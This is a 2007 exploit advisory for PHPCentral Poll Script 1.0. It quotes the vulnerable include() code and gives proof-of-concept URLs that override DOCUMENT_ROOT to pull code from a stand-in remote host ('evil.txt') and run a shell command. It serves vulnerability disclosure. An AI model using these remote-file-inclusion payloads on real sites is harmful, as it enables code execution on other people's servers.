PHPCentral Poll Script Remote Command Execution Vulnerability

Advisory Content :

PHPCentral Poll Script Remote Command Execution Vulnerability
-----------------------------------------------------------------------

Script : PHPCentral Poll Script

Version : 1.0

Site : http://www.phpcentral.org/scripts.php

Founder : Rizgar

Contact : rizgar (at) linuxmail (dot) org [email concealed] and
irc.gigachat.net #kurdhack

Thanks : Kurdish Hackers Clan(Anti Fashist Group :P), PH(HERO) ,
ColdHackers(nice boys)

d0rk : not d0rk :)

-----------------------------------------------------------------------

Vulnerability details :

This vulnerability allows remote attackers to execute arbitrary code on
systems with vulnerable installations of the PHPCentral Poll script.

------------------------------------------------------------------------

look at poll.php, pollarchive.php

poll.php ;

Lines 2,3,4 ;

$folder = "poll"; // Folder in which poll files are -- (default folder is
"poll")
include("".$_SERVER[DOCUMENT_ROOT]."/$folder/functions.php");
include("".$_SERVER[DOCUMENT_ROOT]."/$folder/config.php");

pollarchive.php

Lines : 2,3,4

$folder = "poll"; // Folder in which poll files are -- (default folder is
"poll")
include("".$_SERVER[DOCUMENT_ROOT]."/$folder/functions.php");
include("".$_SERVER[DOCUMENT_ROOT]."/$folder/config.php");

PoC :

http://www.example.com/poll.php?_SERVER[DOCUMENT_ROOT]=http://evil.txt?&
cmd=id

http://www.example.com/pollarchive.php?_SERVER[DOCUMENT_ROOT]=http://evi
l.txt?&cmd=id

# milw0rm.com [2007-08-10]

Security

IT News

Search

SecurityAlert Database

About SecurityAlert

ExploitAlert Database

SecurityReason Research

WLB Database

Send to WLB

About WLB

Security Audit

Schedule

Prices of services

Contact

SecurityReason IT News

SecurityAlert

World Laboratory of Bugtraq

ExploitAlert

Apache

PHP

Contact

About SecurityReason

PHPCentral Poll Script Remote Command Execution Vulnerability